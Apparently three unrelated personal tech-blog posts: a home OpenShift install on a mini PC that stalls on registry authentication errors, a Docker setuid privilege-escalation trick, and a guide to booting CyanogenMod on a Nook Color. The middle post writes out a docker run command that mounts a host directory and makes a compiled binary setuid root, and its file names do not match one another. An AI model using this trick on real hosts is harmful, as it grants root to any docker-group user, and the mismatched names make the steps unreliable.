After working on the HP Chromebox G1 – I discovered that a single 32 GB DDR3 SODIMM was going to cost 3 times what the Chromebox itself cost me to begin with.  It quickly became evident my openshift experiment was going to be limited using the Chromebox, so I decided to try on another PC I had available, this was a bee-link GTR5.  In addition to the internal SSD, I also added a 1 TB NVME drive.

The chromebox G1’s might be possible to use as a microshift cluster but still waiting on the parts to really determine if that’s possible.

The GTR5 was previously used as a desktop machine running the i3 respin of Fedora.  First step was to back up everything and then off to the races with openshift.

I started out following this guide.

https://www.redhat.com/sysadmin/low-cost-openshift-cluster

Installation followed pretty closely, I’m only going to note any special steps I did on my side.

I’m running a pretty simple consumer grade router, but it let me configured the DHCP hostname – I set the GTR5 as “hive.geolaw.loc” and used that in the cluster details.

Cluster Name: hive
Base Domain: geolaw.loc

Copied my ssh .pub and then generated the discovery iso

DNS entries : like I said, I’ve got a cheap consumer class router, does not support adding DNS entries.
So on the machines I plan on accessing the web GUI or ‘oc’ –  I plan on just using the following /etc/hosts entries :

$ grep hive /etc/hosts
192.166.29.7 api.hive.geolaw.loc *.apps.hive.geolaw.loc api-int.hive.geolaw.loc

Booting the discovery.iso

I had an existing Ventoy USB drive that I first tried just dropping the iso file into the Ventoy partition – this did not boot properly for me and went to an emergency shell.  I then just used dd to write the discovery iso to the thumb drive:
$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=1024

Once this finished I rebooted the GTR5 and from the UEFI level selected the USB to boot from.

After booting, the agent.service was failing due to it being unable to pull from the redhat.io registry:

Jun 22 14:26:26 hive podman[17680]: Error: initializing source docker://registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/articles/3399531
Jun 22 14:26:29 hive podman[17749]: Trying to pull registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264…

To fix this I ssh’d into the openshift installer, su’d to root, and then logged into to registry.redhat.io.  Once I logged in, I restarted the agent.service and away it went!

$ ssh core@hive
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
This is a host being installed by the OpenShift Assisted Installer.
It will be installed from scratch during the installation.

The primary service is agent.service. To watch its status, run:
sudo journalctl -u agent.service

To view the agent log, run:
sudo journalctl TAG=agent
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
Last login: Thu Jun 22 14:26:22 2023 from 192.168.29.16
[core@hive ~]$ sudo su –
Last login: Thu Jun 22 14:17:22 UTC 2023 on pts/0
[root@hive ~]# podman login registry.redhat.io
Authenticating with existing credentials for registry.redhat.io
Existing credentials are invalid, please enter valid username and password
Username (|uhc-pool-81ec5a21-635b-4c43-8409-63e45c46ad51): glaw@redhat.com
Password:
Login Succeeded!
[root@hive ~]# systemctl restart agent

The discovered host eventually popped up in the assisted installer and I was able to select my network and continue the install.

The host rebooted several times along the way as it was processing the install.

Watching the console I could see where it was pulling down the containers and starting them.

but again getting the registry errors and the containers going into a ImagePullBackOff state

Jun 22 15:42:07 hive kubenswrapper[2978]: E0622 15:42:07.423504 2978 pod_workers.go:965] “Error syncing pod, skipping” err=”failed to \”StartContainer\” for \”registry-server\” with ImagePullBackOff: \”Back-off pulling image \\\”registry.redhat.io/redhat/certified-operator-index:v4.13\\\”\”” pod=”openshift-marketplace/certified-operators-bb2nx” podUID=0f76c0fa-cb11-436f-9e7e-77357117b313

I tried doing the podman register again, as root, as core, as containers .. no bueno 🙁

Oh well, good first test, will have to retry later.

I was amazed at how easy this was.  I found a couple different websites that lead me to this, giving credit where credit is due

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So putting 1 and 2 together.  I have my docker install running as the “docker” user, so no “sudo” required.  All I did (as docker) is :

1. Create the following snippet of C code shutdown_suid.c :
docker $> vi shutdown_suid.c
include <stdlib.h>
include <unistd.h>

int main() {
setuid(0);
system(“/sbin/shutdown -h now”); /* change this to the actual location of shutdown */
return 0;
}

2. Compile it :docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to mount the current directory and set rebuild_setuid to be owned as root and turn on the setuid permissions :
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c ‘chown root.root /stuff/reboot_setuid && chmod a+s /stuff/reboot_setuid’

4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid

Converting a nook color into a Jellybean 4.1 tablet.  I think it took me longer to write this up than to actually do it 🙂

Done on Linux Mint – bash commands are showing in bold italics

1. grab a microsd card – they say that Sandisk brand, at least Class 4 works best.
   I have done this with both a 4GB and 8GB card, both worked, you can go larger – I am not sure if there is a max capacity supported by Android or the nook
2. Download the boot image – http://forum.xda-developers.com/showthread.php?p=32921666#post32921666
   Look for the attachment to the main article – generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
   I get a md5sum of : a2f15e48a5bb858db8ec02ccedbcb5b7
3. glaw@mint:~$ mkdir nook
4. glaw@mint:~/nook$ wget http://download.cyanogenmod.com/get/jenkins/17892/cm-10-20130114-NIGHTLY-encore.zip  
5. glaw@mint:~/nook$ wget http://goo.im/gapps/gapps-jb-20121011-signed.zip
6. glaw@mint:~/nook$ md5sum cm*.zip gapp*.zip

   3cc2124c8f91e133ec28d438ccd5204f  cm-10-20130114-NIGHTLY-encore.zip
   4e9e7ec3c22b0b3471bd05d62b8a659d  gapps-jb-20121011-signed.zip

7. glaw@mint:~/nook$ unzip generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip

   Archive:  generic-sdcard-v1.3-CM7-9-10-larger-Rev5.zip
     inflating: generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img

8. glaw@mint:~/nook$ sudo dd if=generic-sdcard-v1.3-CM7-9-10-larger-Rev5.img of=/dev/sde bs=1M

   [sudo] password for glaw: 
   298+1 records in
   298+1 records out
   312560640 bytes (313 MB) copied, 69.6386 s, 4.5 MB/s

9. eject the card and reinsert – I just disconnected my card reader and reconnected
10. Mount the cd card – this is a 300 mb vfat parition
    
    glaw@mint:~/nook$ sudo mount /dev/sde1 /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 8112
    drwxr-xr-x  2 root root    4096 Dec 31  1969 .
    drwxr-xr-x 27 root root    4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root   14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root  289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root 2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root 5234466 Oct 17 19:41 uRamdisk

11. glaw@mint:~/nook$ sudo cp cm*.zip gapp*.zip /mnt
    glaw@mint:~/nook$ls -la /mnt

    total 253116
    drwxr-xr-x  2 root root      4096 Dec 31  1969 .
    drwxr-xr-x 27 root root      4096 Jan 18 00:13 ..
    -rwxr-xr-x  1 root root 158172246 Jan 19 10:14 cm-10-20130114-NIGHTLY-encore.zip
    -rwxr-xr-x  1 root root  92706064 Jan 19 10:15 gapps-jb-20121011-signed.zip
    -rwxr-xr-x  1 root root     14504 Feb 15  2011 MLO
    -rwxr-xr-x  1 root root    289328 May 29  2011 u-boot.bin
    -rwxr-xr-x  1 root root   2756116 May 14  2011 uImage
    -rwxr-xr-x  1 root root   5234466 Oct 17 19:41 uRamdisk

12. glaw@mint:~/nook$ sudo umount /mnt
13. eject the card,
14. With the nook powered off, insert into the nook’s microsd slot and then power on.  Sit back and relax for 4 and a half minutes :
    http://www.youtube.com/watch?v=Bsipwz3pk3I
15. repower on the nook and welcome to Android Jellybean.
    http://www.youtube.com/watch?v=3vaO3W6HJU4